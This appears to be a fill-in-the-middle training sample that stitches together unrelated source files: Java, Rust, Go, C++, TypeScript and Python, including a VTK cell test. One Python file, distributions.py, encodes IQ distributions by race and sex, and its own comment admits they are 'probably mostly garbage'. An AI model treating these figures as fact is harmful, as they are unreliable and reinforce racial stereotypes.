(arrowType == 1) { // arrow down Line2D line = new Line2D.Double(arrX, arrY - s1, arrX, arrY - s3); Path2D path = new Path2D.Double(); path.moveTo(arrX - 0.05, arrY - s3); path.lineTo(arrX + 0.05, arrY - s3); path.lineTo(arrX, arrY); path.closePath(); g.fill(path); g.draw(line); } else if (arrowType == 2) { // arrow up Line2D line = new Line2D.Double(arrX, arrY, arrX, arrY - s2); Path2D path = new Path2D.Double(); path.moveTo(arrX - 0.05, arrY - s2); path.lineTo(arrX + 0.05, arrY - s2); path.lineTo(arrX, arrY - s1); path.closePath(); g.fill(path); g.draw(line); } } private void drawFormula(Graphics2D g, int arrowType, Point2D offset, FormulaRenderingResult renderingResult) { if (renderingResult != null) { Direction dir = getDirection(); if (!(getParent() instanceof VisualFunctionComponent)) { dir = dir.flip(); } AffineTransform savedTransform = g.getTransform(); if ((dir == Direction.NORTH) || (dir == Direction.SOUTH)) { AffineTransform rotateTransform = new AffineTransform(); rotateTransform.quadrantRotate(-1); g.transform(rotateTransform); } double dXArrow = -0.15; if ((dir == Direction.SOUTH) || (dir == Direction.WEST)) { dXArrow = renderingResult.boundingBox.getWidth() + 0.15; } drawArrow(g, arrowType, offset.getX() + dXArrow, offset.getY()); g.translate(offset.getX(), offset.getY()); renderingResult.draw(g); g.setTransform(savedTransform); } } @Override public void draw(DrawRequest r) { if (needsFormulas()) { Graphics2D g = r.getGraphics(); Decoration d = r.getDecoration(); g.setColor(ColorUtils.colorise(getForegroundColor(), d.getColorisation())); FormulaRenderingResult renderingResult; renderingResult = getRenderedSetFunction(); if (renderingResult != null) { Point2D offset = getSetFormulaOffset(); drawFormula(g, 2, offset, renderingResult); } renderingResult = getRenderedResetFunction(); if (renderingResult != null) { Point2D offset = getResetFormulaOffset(); drawFormula(g, 1, offset, renderingResult); } } super.draw(r); } private boolean needsFormulas() { boolean result = false; Node parent = getParent(); if (parent != null) { // Primary input port if (!(parent instanceof VisualCircuitComponent) && isInput()) { result = true; } // Output port of a BOX-rendered component if ((parent instanceof VisualFunctionComponent) && isOutput()) { VisualFunctionComponent component = (VisualFunctionComponent) parent; if (component.getRenderType() == RenderType.BOX) { result = true; } } } return result; } @Override public Rectangle2D getBoundingBoxInLocalSpace() { Rectangle2D bb = super.getBoundingBoxInLocalSpace(); if (needsFormulas()) { bb = BoundingBoxHelper.union(bb, getSetBoundingBox()); bb = BoundingBoxHelper.union(bb, getResetBoundingBox()); } return bb; } private Collection<VisualFunctionContact> getAllContacts() { HashSet<VisualFunctionContact> result = new HashSet<>(); Node root = Hierarchy.getRoot(this); if (root != null) { result.addAll(Hierarchy.getDescendantsOfType(root, VisualFunctionContact.class)); } return result; } @Override public void notify(StateEvent e) { if (e instanceof PropertyChangedEvent) { PropertyChangedEvent pc = (PropertyChangedEvent) e; String propertyName = pc.getPropertyName(); if (propertyName.equals(FunctionContact.PROPERTY_SET_FUNCTION) || propertyName.equals(FunctionContact.PROPERTY_RESET_FUNCTION)) { invalidateRenderedFormula(); } if (propertyName.equals(Contact.PROPERTY_NAME)) { for (VisualFunctionContact vc : getAllContacts()) { vc.invalidateRenderedFormula(); } } } super.notify(e); } }<|fim▁end|>
@DisplayName("Input/output port")
<|file_name|>text-element-view.component.ts<|end_file_name|><|fim▁begin|>import { Component, OnInit, Output, Input, EventEmitter } from '@angular/core'; @Component({ selector: 'fcl-text-element-view', templateUrl: './text-element-view.component.html', styleUrls: ['./text-element-view.component.scss'] }) export class TextElementViewComponent implements OnInit { @Input() set value(value: string) { if (value !== this.lastInput) { this.initialValue = value; } } @Output() valueChange = new EventEmitter<string>(); private lastInput: string = undefined; initialValue: string = undefined; constructor() { } ngOnInit() { } onKeyDown(e: KeyboardEvent): boolean { // filter out Enter return !(e.key === 'Enter'); } onPaste(e: ClipboardEvent): void { // cancel default paste e.preventDefault(); // get text representation of clipboard const text = e.clipboardData.getData('text/plain'); if (text !== undefined && text !== null) { // remove linebreaks and insert text manually document.execCommand('insertHTML', false, text.replace(/(\r\n|\n|\r)/gm, '')); }<|fim▁hole|> onInput(e: Event): void { const textBox = (e.target as HTMLDivElement); const textContent = textBox.textContent; this.lastInput = textContent; this.valueChange.emit(textContent); } }<|fim▁end|>
}
<|file_name|>parser.rs<|end_file_name|><|fim▁begin|>use nom::{be_u16, be_u32, be_u8, Err, ErrorKind}; use attribute_info::types::StackMapFrame::*; use attribute_info::*; pub fn attribute_parser(input: &[u8]) -> Result<(&[u8], AttributeInfo), Err<&[u8]>> { do_parse!( input, attribute_name_index: be_u16 >> attribute_length: be_u32 >> info: take!(attribute_length) >> (AttributeInfo { attribute_name_index, attribute_length, info: info.to_owned(), }) ) } pub fn exception_entry_parser(input: &[u8]) -> Result<(&[u8], ExceptionEntry), Err<&[u8]>> { do_parse!( input, start_pc: be_u16 >> end_pc: be_u16 >> handler_pc: be_u16 >> catch_type: be_u16 >> (ExceptionEntry { start_pc, end_pc, handler_pc, catch_type, }) ) } pub fn code_attribute_parser(input: &[u8]) -> Result<(&[u8], CodeAttribute), Err<&[u8]>> { do_parse!( input, max_stack: be_u16 >> max_locals: be_u16 >> code_length: be_u32 >> code: take!(code_length) >> exception_table_length: be_u16 >> exception_table: count!(exception_entry_parser, exception_table_length as usize) >> attributes_count: be_u16 >> attributes: count!(attribute_parser, attributes_count as usize) >> (CodeAttribute { max_stack, max_locals, code_length, code: code.to_owned(), exception_table_length, exception_table, attributes_count, attributes, }) ) } fn same_frame_parser(input: &[u8], frame_type: u8) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { value!(input, SameFrame { frame_type }) } fn verification_type(v: u8) -> Option<VerificationTypeInfo> { use self::VerificationTypeInfo::*; match v { 0 => Some(Top), 1 => Some(Integer), 2 => Some(Float), 3 => Some(Double), 4 => Some(Long), 5 => Some(Null), 6 => Some(UninitializedThis), 7 => Some(Object), 8 => Some(Uninitialized), _ => None, } } <|fim▁hole|> _ => Result::Err(Err::Error(error_position!(input, ErrorKind::Custom(1)))), } } fn same_locals_1_stack_item_frame_parser( input: &[u8], frame_type: u8, ) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { do_parse!( input, stack: verification_type_parser >> (SameLocals1StackItemFrame { frame_type, stack }) ) } fn same_locals_1_stack_item_frame_extended_parser( input: &[u8], frame_type: u8, ) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { do_parse!( input, offset_delta: be_u16 >> stack: verification_type_parser >> (SameLocals1StackItemFrameExtended { frame_type, offset_delta, stack }) ) } fn chop_frame_parser(input: &[u8], frame_type: u8) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { do_parse!( input, offset_delta: be_u16 >> (ChopFrame { frame_type, offset_delta }) ) } fn same_frame_extended_parser( input: &[u8], frame_type: u8, ) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { do_parse!( input, offset_delta: be_u16 >> (SameFrameExtended { frame_type, offset_delta }) ) } fn append_frame_parser(input: &[u8], frame_type: u8) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { do_parse!( input, offset_delta: be_u16 >> locals: count!(verification_type_parser, (frame_type - 251) as usize) >> (AppendFrame { frame_type, offset_delta, locals }) ) } fn full_frame_parser(input: &[u8], frame_type: u8) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { do_parse!( input, offset_delta: be_u16 >> number_of_locals: be_u16 >> locals: count!(verification_type_parser, number_of_locals as usize) >> number_of_stack_items: be_u16 >> stack: count!(verification_type_parser, number_of_stack_items as usize) >> (FullFrame { frame_type, offset_delta, number_of_locals, locals, number_of_stack_items, stack, }) ) } fn stack_frame_parser(input: &[u8], frame_type: u8) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { match 
frame_type { 0..=63 => same_frame_parser(input, frame_type), 64..=127 => same_locals_1_stack_item_frame_parser(input, frame_type), 247 => same_locals_1_stack_item_frame_extended_parser(input, frame_type), 248..=250 => chop_frame_parser(input, frame_type), 251 => same_frame_extended_parser(input, frame_type), 252..=254 => append_frame_parser(input, frame_type), 255 => full_frame_parser(input, frame_type), _ => Result::Err(Err::Error(error_position!(input, ErrorKind::Custom(2)))), } } fn stack_map_frame_entry_parser(input: &[u8]) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { do_parse!( input, frame_type: be_u8 >> stack_frame: apply!(stack_frame_parser, frame_type) >> (stack_frame) ) } pub fn stack_map_table_attribute_parser( input: &[u8], ) -> Result<(&[u8], StackMapTableAttribute), Err<&[u8]>> { do_parse!( input, number_of_entries: be_u16 >> entries: count!(stack_map_frame_entry_parser, number_of_entries as usize) >> (StackMapTableAttribute { number_of_entries, entries, }) ) } pub fn exceptions_attribute_parser( input: &[u8], ) -> Result<(&[u8], ExceptionsAttribute), Err<&[u8]>> { do_parse!( input, exception_table_length: be_u16 >> exception_table: count!(be_u16, exception_table_length as usize) >> (ExceptionsAttribute { exception_table_length, exception_table, }) ) } pub fn constant_value_attribute_parser( input: &[u8], ) -> Result<(&[u8], ConstantValueAttribute), Err<&[u8]>> { do_parse!( input, constant_value_index: be_u16 >> (ConstantValueAttribute { constant_value_index, }) ) } fn bootstrap_method_parser(input: &[u8]) -> Result<(&[u8], BootstrapMethod), Err<&[u8]>> { do_parse!( input, bootstrap_method_ref: be_u16 >> num_bootstrap_arguments: be_u16 >> bootstrap_arguments: count!(be_u16, num_bootstrap_arguments as usize) >> (BootstrapMethod { bootstrap_method_ref, num_bootstrap_arguments, bootstrap_arguments, }) ) } pub fn bootstrap_methods_attribute_parser( input: &[u8], ) -> Result<(&[u8], BootstrapMethodsAttribute), Err<&[u8]>> { do_parse!( input, num_bootstrap_methods: be_u16 >> bootstrap_methods: count!(bootstrap_method_parser, num_bootstrap_methods as usize) >> (BootstrapMethodsAttribute { num_bootstrap_methods, bootstrap_methods, }) ) } pub fn sourcefile_attribute_parser( input: &[u8], ) -> Result<(&[u8], SourceFileAttribute), Err<&[u8]>> { do_parse!( input, attribute_name_index: be_u16 >> attribute_length: be_u32 >> sourcefile_index: be_u16 >> (SourceFileAttribute { attribute_name_index, attribute_length, sourcefile_index }) ) }<|fim▁end|>
fn verification_type_parser(input: &[u8]) -> Result<(&[u8], VerificationTypeInfo), Err<&[u8]>> { match verification_type(input[0]) { Some(x) => Result::Ok((&input[1..], x)),
<|file_name|>jquery.lazyloadxt.extra.min.js<|end_file_name|><|fim▁begin|>version https://git-lfs.github.com/spec/v1<|fim▁hole|><|fim▁end|>
oid sha256:b1b66ad7cf63a081650856aed61fbfdf1b6b511e47c622989e9927e504424a5d size 2493
<|file_name|>options.go<|end_file_name|><|fim▁begin|>/* Copyright 2017 The Kubernetes Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package server import ( "fmt" "github.com/kubernetes-incubator/service-catalog/pkg/storage/etcd" "github.com/kubernetes-incubator/service-catalog/pkg/storage/tpr" "k8s.io/apimachinery/pkg/runtime" genericapirequest "k8s.io/apiserver/pkg/endpoints/request" "k8s.io/apiserver/pkg/registry/generic/registry" "k8s.io/apiserver/pkg/registry/rest" "k8s.io/apiserver/pkg/storage" "k8s.io/apiserver/pkg/storage/storagebackend/factory" "k8s.io/client-go/pkg/api" ) type errUnsupportedStorageType struct { t StorageType } func (e errUnsupportedStorageType) Error() string { return fmt.Sprintf("unsupported storage type %s", e.t) } // StorageType represents the type of storage a storage interface should use type StorageType string // StorageTypeFromString converts s to a valid StorageType. Returns StorageType("") and a non-nil // error if s names an invalid or unsupported storage type func StorageTypeFromString(s string) (StorageType, error) { switch s { case StorageTypeTPR.String(): return StorageTypeTPR, nil case StorageTypeEtcd.String(): return StorageTypeEtcd, nil default: return StorageType(""), errUnsupportedStorageType{t: StorageType(s)} } } func (s StorageType) String() string { return string(s) } const ( // StorageTypeTPR indicates a storage interface should use TPRs // TPRs StorageTypeTPR StorageType = "tpr" // StorageTypeEtcd indicates a storage interface should use etcd StorageTypeEtcd StorageType = "etcd" ) // Options is the extension of a generic.RESTOptions struct, complete with service-catalog // specific things type Options struct { EtcdOptions etcd.Options TPROptions tpr.Options storageType StorageType } // NewOptions returns a new Options with the given parameters func NewOptions( etcdOpts etcd.Options, tprOpts tpr.Options, sType StorageType, ) *Options { return &Options{ EtcdOptions: etcdOpts, TPROptions: tprOpts, storageType: sType, } } // StorageType returns the storage type the rest server should use, or an error if an unsupported // storage type is indicated func (o Options) StorageType() (StorageType, error) { switch o.storageType { case StorageTypeTPR, StorageTypeEtcd: return o.storageType, nil default: return StorageType(""), errUnsupportedStorageType{t: o.storageType} } } // ResourcePrefix gets the resource prefix of all etcd keys func (o Options) ResourcePrefix() string { return o.EtcdOptions.RESTOptions.ResourcePrefix } // KeyRootFunc returns the appropriate key root function for the storage type in o. 
// This function produces a path that etcd or TPR storage understands, to the root of the resource // by combining the namespace in the context with the given prefix func (o Options) KeyRootFunc() func(genericapirequest.Context) string { prefix := o.ResourcePrefix() sType, err := o.StorageType() if err != nil { return nil } if sType == StorageTypeEtcd { return func(ctx genericapirequest.Context) string { return registry.NamespaceKeyRootFunc(ctx, prefix) } } return o.TPROptions.Keyer.KeyRoot } // KeyFunc returns the appropriate key function for the storage type in o. // This function should produce a path that etcd or TPR storage understands, to the resource // by combining the namespace in the context with the given prefix func (o Options) KeyFunc(namespaced bool) func(genericapirequest.Context, string) (string, error) { prefix := o.ResourcePrefix() sType, err := o.StorageType() if err != nil { return nil } if sType == StorageTypeEtcd { return func(ctx genericapirequest.Context, name string) (string, error) { if namespaced { return registry.NamespaceKeyFunc(ctx, prefix, name) } return registry.NoNamespaceKeyFunc(ctx, prefix, name)<|fim▁hole|> // GetStorage returns the storage from the given parameters func (o Options) GetStorage( capacity int, objectType runtime.Object, resourcePrefix string, scopeStrategy rest.NamespaceScopedStrategy, newListFunc func() runtime.Object, getAttrsFunc storage.AttrFunc, trigger storage.TriggerPublisherFunc, ) (storage.Interface, factory.DestroyFunc) { if o.storageType == StorageTypeEtcd { etcdRESTOpts := o.EtcdOptions.RESTOptions return etcdRESTOpts.Decorator( api.Scheme, etcdRESTOpts.StorageConfig, &capacity, objectType, resourcePrefix, nil, /* keyFunc for decorator -- looks to be unused everywhere */ newListFunc, getAttrsFunc, trigger, ) } return tpr.NewStorage(o.TPROptions) }<|fim▁end|>
} } return o.TPROptions.Keyer.Key }
<|file_name|>bound-single-question-mark.rs<|end_file_name|><|fim▁begin|>// Copyright 2017 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. //<|fim▁hole|>// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. // compile-flags: -Z parse-only fn f<T: ?>() {} //~ ERROR expected identifier, found `>`<|fim▁end|>
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
<|file_name|>CommandManager.ts<|end_file_name|><|fim▁begin|>import { CommandManager } from "./../../browser/src/Services/CommandManager" export const mockRegisterCommands = jest.fn()<|fim▁hole|>export default MockCommands<|fim▁end|>
const MockCommands = jest.fn<CommandManager>().mockImplementation(() => ({ registerCommand: mockRegisterCommands, }))
<|file_name|>distributions.py<|end_file_name|><|fim▁begin|>identity = { # https://www.census.gov/prod/cen2010/briefs/c2010br-03.pdf 'sex': [('M',49.2),('F',50.8)], # https://en.wikipedia.org/wiki/Race_and_ethnicity_in_the_United_States 'race': [('O',72.4),('U',12.6)] } iq = { # Class: (mu, sigma) # http://www.iqcomparisonsite.com/sexdifferences.aspx 'M': (103.08, 14.54),<|fim▁hole|> # https://commons.wikimedia.org/wiki/File:WAIS-IV_FSIQ_Scores_by_Race_and_Ethnicity.png 'O': (103.21, 13.77), 'U': (88.67, 13.68), # http://isteve.blogspot.com/2005/12/do-black-women-have-higher-iqs-than.html # See the URL above for the provenance of the figures. As heritable measures of IQ, # they are probably mostly garbage. But they provide a representative basis for a # certain kind of "scientific" view of the world. And they were the only ones # I came across that broke down mu and sigma values by sex and race. 'UF': (90.8, 13.58), 'UM': (88.4, 13.30), 'OF': (103.6, 13.30), 'OM': (102.7, 14.75) }<|fim▁end|>
'F': (101.41, 13.55),
<|file_name|>time.hh<|end_file_name|><|fim▁begin|>#pragma once #include <cstdint> #include <cstddef> #include <ctime> #include <stdexcept> #include <unistd.h> #include <sys/time.h> #ifdef __MACH__ # include <mach/mach.h> # include <mach/clock.h> #endif #ifndef CLOCK_MONOTONIC_COARSE # define CLOCK_MONOTONIC_COARSE CLOCK_MONOTONIC #endif #ifndef CLOCK_REALTIME_COARSE # define CLOCK_REALTIME_COARSE CLOCK_REALTIME #endif namespace mimosa { // signed to ease time substraction using Time = std::int64_t; const Time nanosecond = 1; const Time microsecond = 1000 * nanosecond; const Time millisecond = 1000 * microsecond; const Time second = 1000 * millisecond; const Time minute = 60 * second; const Time hour = 60 * minute; const Time day = 24 * hour; #ifdef __MACH__ inline Time realTime() noexcept { ::clock_serv_t cal_clock; ::mach_timespec tp; ::host_get_clock_service(mach_host_self(), CALENDAR_CLOCK, &cal_clock); ::clock_get_time(cal_clock, &tp); return tp.tv_nsec * nanosecond + tp.tv_sec * second; } inline Time monotonicTime() noexcept { ::clock_serv_t sys_clock; ::mach_timespec tp; ::host_get_clock_service(mach_host_self(), SYSTEM_CLOCK, &sys_clock);<|fim▁hole|> ::clock_get_time(sys_clock, &tp); return tp.tv_nsec * nanosecond + tp.tv_sec * second; } inline Time realTimeCoarse() noexcept { return realTime(); } inline Time monotonicTimeCoarse() noexcept { return monotonicTime(); } #else inline Time realTime() { ::timespec tp; int ret = ::clock_gettime(CLOCK_REALTIME, &tp); if (ret) throw std::runtime_error("clock_gettime"); return tp.tv_nsec * nanosecond + tp.tv_sec * second; } inline Time monotonicTime() { ::timespec tp; int ret = ::clock_gettime(CLOCK_MONOTONIC, &tp); if (ret) throw std::runtime_error("clock_gettime"); return tp.tv_nsec * nanosecond + tp.tv_sec * second; } inline Time realTimeCoarse() { ::timespec tp; int ret = ::clock_gettime(CLOCK_REALTIME_COARSE, &tp); if (ret) throw std::runtime_error("clock_gettime"); return tp.tv_nsec * nanosecond + tp.tv_sec * second; } inline Time monotonicTimeCoarse() { ::timespec tp; int ret = ::clock_gettime(CLOCK_MONOTONIC_COARSE, &tp); if (ret) throw std::runtime_error("clock_gettime"); return tp.tv_nsec * nanosecond + tp.tv_sec * second; } #endif inline Time time() { return monotonicTimeCoarse(); } inline ::timespec toTimeSpec(Time time) noexcept { ::timespec tp; tp.tv_sec = time / second; tp.tv_nsec = time % second; return tp; } inline ::timeval toTimeVal(Time time) noexcept { ::timeval tv; tv.tv_sec = time / second; tv.tv_usec = (time % second) / microsecond; return tv; } inline void sleep(Time duration) noexcept { ::usleep(duration / microsecond); } }<|fim▁end|>
<|file_name|>_locationssrc.py<|end_file_name|><|fim▁begin|>import _plotly_utils.basevalidators class LocationssrcValidator(_plotly_utils.basevalidators.SrcValidator): def __init__(self, plotly_name="locationssrc", parent_name="choropleth", **kwargs):<|fim▁hole|> edit_type=kwargs.pop("edit_type", "none"), role=kwargs.pop("role", "info"), **kwargs )<|fim▁end|>
super(LocationssrcValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name,
<|file_name|>pickCells.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python import vtk from vtk.test import Testing from vtk.util.misc import vtkGetDataRoot VTK_DATA_ROOT = vtkGetDataRoot() ren1 = vtk.vtkRenderer() renWin = vtk.vtkRenderWindow() renWin.AddRenderer(ren1) iren = vtk.vtkRenderWindowInteractor() iren.SetRenderWindow(renWin) # create a scene with one of each cell type # Voxel voxelPoints = vtk.vtkPoints() voxelPoints.SetNumberOfPoints(8) voxelPoints.InsertPoint(0,0,0,0) voxelPoints.InsertPoint(1,1,0,0) voxelPoints.InsertPoint(2,0,1,0) voxelPoints.InsertPoint(3,1,1,0) voxelPoints.InsertPoint(4,0,0,1) voxelPoints.InsertPoint(5,1,0,1) voxelPoints.InsertPoint(6,0,1,1) voxelPoints.InsertPoint(7,1,1,1) aVoxel = vtk.vtkVoxel() aVoxel.GetPointIds().SetId(0,0) aVoxel.GetPointIds().SetId(1,1) aVoxel.GetPointIds().SetId(2,2) aVoxel.GetPointIds().SetId(3,3) aVoxel.GetPointIds().SetId(4,4) aVoxel.GetPointIds().SetId(5,5) aVoxel.GetPointIds().SetId(6,6) aVoxel.GetPointIds().SetId(7,7) aVoxelGrid = vtk.vtkUnstructuredGrid() aVoxelGrid.Allocate(1,1) aVoxelGrid.InsertNextCell(aVoxel.GetCellType(),aVoxel.GetPointIds()) aVoxelGrid.SetPoints(voxelPoints) aVoxelMapper = vtk.vtkDataSetMapper() aVoxelMapper.SetInputData(aVoxelGrid) aVoxelActor = vtk.vtkActor() aVoxelActor.SetMapper(aVoxelMapper) aVoxelActor.GetProperty().BackfaceCullingOn() # Hexahedron hexahedronPoints = vtk.vtkPoints() hexahedronPoints.SetNumberOfPoints(8) hexahedronPoints.InsertPoint(0,0,0,0) hexahedronPoints.InsertPoint(1,1,0,0) hexahedronPoints.InsertPoint(2,1,1,0) hexahedronPoints.InsertPoint(3,0,1,0) hexahedronPoints.InsertPoint(4,0,0,1) hexahedronPoints.InsertPoint(5,1,0,1) hexahedronPoints.InsertPoint(6,1,1,1) hexahedronPoints.InsertPoint(7,0,1,1) aHexahedron = vtk.vtkHexahedron() aHexahedron.GetPointIds().SetId(0,0) aHexahedron.GetPointIds().SetId(1,1) aHexahedron.GetPointIds().SetId(2,2) aHexahedron.GetPointIds().SetId(3,3) aHexahedron.GetPointIds().SetId(4,4) aHexahedron.GetPointIds().SetId(5,5) aHexahedron.GetPointIds().SetId(6,6) aHexahedron.GetPointIds().SetId(7,7) aHexahedronGrid = vtk.vtkUnstructuredGrid() aHexahedronGrid.Allocate(1,1) aHexahedronGrid.InsertNextCell(aHexahedron.GetCellType(),aHexahedron.GetPointIds()) aHexahedronGrid.SetPoints(hexahedronPoints) aHexahedronMapper = vtk.vtkDataSetMapper() aHexahedronMapper.SetInputData(aHexahedronGrid) aHexahedronActor = vtk.vtkActor() aHexahedronActor.SetMapper(aHexahedronMapper) aHexahedronActor.AddPosition(2,0,0) aHexahedronActor.GetProperty().BackfaceCullingOn() # Tetra tetraPoints = vtk.vtkPoints() tetraPoints.SetNumberOfPoints(4) tetraPoints.InsertPoint(0,0,0,0) tetraPoints.InsertPoint(1,1,0,0) tetraPoints.InsertPoint(2,.5,1,0) tetraPoints.InsertPoint(3,.5,.5,1) aTetra = vtk.vtkTetra() aTetra.GetPointIds().SetId(0,0) aTetra.GetPointIds().SetId(1,1) aTetra.GetPointIds().SetId(2,2) aTetra.GetPointIds().SetId(3,3) aTetraGrid = vtk.vtkUnstructuredGrid() aTetraGrid.Allocate(1,1) aTetraGrid.InsertNextCell(aTetra.GetCellType(),aTetra.GetPointIds()) aTetraGrid.SetPoints(tetraPoints) aTetraMapper = vtk.vtkDataSetMapper() aTetraMapper.SetInputData(aTetraGrid) aTetraActor = vtk.vtkActor() aTetraActor.SetMapper(aTetraMapper) aTetraActor.AddPosition(4,0,0) aTetraActor.GetProperty().BackfaceCullingOn() # Wedge wedgePoints = vtk.vtkPoints() wedgePoints.SetNumberOfPoints(6) wedgePoints.InsertPoint(0,0,1,0) wedgePoints.InsertPoint(1,0,0,0) wedgePoints.InsertPoint(2,0,.5,.5) wedgePoints.InsertPoint(3,1,1,0) wedgePoints.InsertPoint(4,1,0,0) wedgePoints.InsertPoint(5,1,.5,.5) 
aWedge = vtk.vtkWedge() aWedge.GetPointIds().SetId(0,0) aWedge.GetPointIds().SetId(1,1) aWedge.GetPointIds().SetId(2,2) aWedge.GetPointIds().SetId(3,3) aWedge.GetPointIds().SetId(4,4) aWedge.GetPointIds().SetId(5,5) aWedgeGrid = vtk.vtkUnstructuredGrid() aWedgeGrid.Allocate(1,1) aWedgeGrid.InsertNextCell(aWedge.GetCellType(),aWedge.GetPointIds()) aWedgeGrid.SetPoints(wedgePoints) aWedgeMapper = vtk.vtkDataSetMapper() aWedgeMapper.SetInputData(aWedgeGrid) aWedgeActor = vtk.vtkActor() aWedgeActor.SetMapper(aWedgeMapper) aWedgeActor.AddPosition(6,0,0) aWedgeActor.GetProperty().BackfaceCullingOn() # Pyramid pyramidPoints = vtk.vtkPoints() pyramidPoints.SetNumberOfPoints(5) pyramidPoints.InsertPoint(0,0,0,0) pyramidPoints.InsertPoint(1,1,0,0) pyramidPoints.InsertPoint(2,1,1,0) pyramidPoints.InsertPoint(3,0,1,0) pyramidPoints.InsertPoint(4,.5,.5,1) aPyramid = vtk.vtkPyramid() aPyramid.GetPointIds().SetId(0,0) aPyramid.GetPointIds().SetId(1,1) aPyramid.GetPointIds().SetId(2,2) aPyramid.GetPointIds().SetId(3,3) aPyramid.GetPointIds().SetId(4,4) aPyramidGrid = vtk.vtkUnstructuredGrid() aPyramidGrid.Allocate(1,1) aPyramidGrid.InsertNextCell(aPyramid.GetCellType(),aPyramid.GetPointIds()) aPyramidGrid.SetPoints(pyramidPoints) aPyramidMapper = vtk.vtkDataSetMapper() aPyramidMapper.SetInputData(aPyramidGrid) aPyramidActor = vtk.vtkActor() aPyramidActor.SetMapper(aPyramidMapper) aPyramidActor.AddPosition(8,0,0) aPyramidActor.GetProperty().BackfaceCullingOn() # Pixel pixelPoints = vtk.vtkPoints() pixelPoints.SetNumberOfPoints(4) pixelPoints.InsertPoint(0,0,0,0) pixelPoints.InsertPoint(1,1,0,0) pixelPoints.InsertPoint(2,0,1,0) pixelPoints.InsertPoint(3,1,1,0) aPixel = vtk.vtkPixel() aPixel.GetPointIds().SetId(0,0) aPixel.GetPointIds().SetId(1,1) aPixel.GetPointIds().SetId(2,2) aPixel.GetPointIds().SetId(3,3) aPixelGrid = vtk.vtkUnstructuredGrid() aPixelGrid.Allocate(1,1) aPixelGrid.InsertNextCell(aPixel.GetCellType(),aPixel.GetPointIds()) aPixelGrid.SetPoints(pixelPoints) aPixelMapper = vtk.vtkDataSetMapper() aPixelMapper.SetInputData(aPixelGrid) aPixelActor = vtk.vtkActor() aPixelActor.SetMapper(aPixelMapper) aPixelActor.AddPosition(0,0,2) aPixelActor.GetProperty().BackfaceCullingOn() # Quad quadPoints = vtk.vtkPoints() quadPoints.SetNumberOfPoints(4) quadPoints.InsertPoint(0,0,0,0) quadPoints.InsertPoint(1,1,0,0) quadPoints.InsertPoint(2,1,1,0) quadPoints.InsertPoint(3,0,1,0) aQuad = vtk.vtkQuad() aQuad.GetPointIds().SetId(0,0) aQuad.GetPointIds().SetId(1,1) aQuad.GetPointIds().SetId(2,2) aQuad.GetPointIds().SetId(3,3) aQuadGrid = vtk.vtkUnstructuredGrid() aQuadGrid.Allocate(1,1) aQuadGrid.InsertNextCell(aQuad.GetCellType(),aQuad.GetPointIds()) aQuadGrid.SetPoints(quadPoints) aQuadMapper = vtk.vtkDataSetMapper() aQuadMapper.SetInputData(aQuadGrid) aQuadActor = vtk.vtkActor() aQuadActor.SetMapper(aQuadMapper) aQuadActor.AddPosition(2,0,2) aQuadActor.GetProperty().BackfaceCullingOn() # Triangle trianglePoints = vtk.vtkPoints() trianglePoints.SetNumberOfPoints(3) trianglePoints.InsertPoint(0,0,0,0) trianglePoints.InsertPoint(1,1,0,0) trianglePoints.InsertPoint(2,.5,.5,0) aTriangle = vtk.vtkTriangle() aTriangle.GetPointIds().SetId(0,0) aTriangle.GetPointIds().SetId(1,1) aTriangle.GetPointIds().SetId(2,2) aTriangleGrid = vtk.vtkUnstructuredGrid() aTriangleGrid.Allocate(1,1) aTriangleGrid.InsertNextCell(aTriangle.GetCellType(),aTriangle.GetPointIds()) aTriangleGrid.SetPoints(trianglePoints) aTriangleMapper = vtk.vtkDataSetMapper() aTriangleMapper.SetInputData(aTriangleGrid) aTriangleActor = vtk.vtkActor() 
aTriangleActor.SetMapper(aTriangleMapper) aTriangleActor.AddPosition(4,0,2) aTriangleActor.GetProperty().BackfaceCullingOn() # Polygon polygonPoints = vtk.vtkPoints() polygonPoints.SetNumberOfPoints(4) polygonPoints.InsertPoint(0,0,0,0) polygonPoints.InsertPoint(1,1,0,0) polygonPoints.InsertPoint(2,1,1,0) polygonPoints.InsertPoint(3,0,1,0) aPolygon = vtk.vtkPolygon() aPolygon.GetPointIds().SetNumberOfIds(4) aPolygon.GetPointIds().SetId(0,0) aPolygon.GetPointIds().SetId(1,1) aPolygon.GetPointIds().SetId(2,2) aPolygon.GetPointIds().SetId(3,3) aPolygonGrid = vtk.vtkUnstructuredGrid() aPolygonGrid.Allocate(1,1) aPolygonGrid.InsertNextCell(aPolygon.GetCellType(),aPolygon.GetPointIds()) aPolygonGrid.SetPoints(polygonPoints) aPolygonMapper = vtk.vtkDataSetMapper() aPolygonMapper.SetInputData(aPolygonGrid) aPolygonActor = vtk.vtkActor() aPolygonActor.SetMapper(aPolygonMapper) aPolygonActor.AddPosition(6,0,2) aPolygonActor.GetProperty().BackfaceCullingOn() # Triangle Strip triangleStripPoints = vtk.vtkPoints() triangleStripPoints.SetNumberOfPoints(5) triangleStripPoints.InsertPoint(0,0,1,0) triangleStripPoints.InsertPoint(1,0,0,0) triangleStripPoints.InsertPoint(2,1,1,0) triangleStripPoints.InsertPoint(3,1,0,0) triangleStripPoints.InsertPoint(4,2,1,0) aTriangleStrip = vtk.vtkTriangleStrip() aTriangleStrip.GetPointIds().SetNumberOfIds(5) aTriangleStrip.GetPointIds().SetId(0,0) 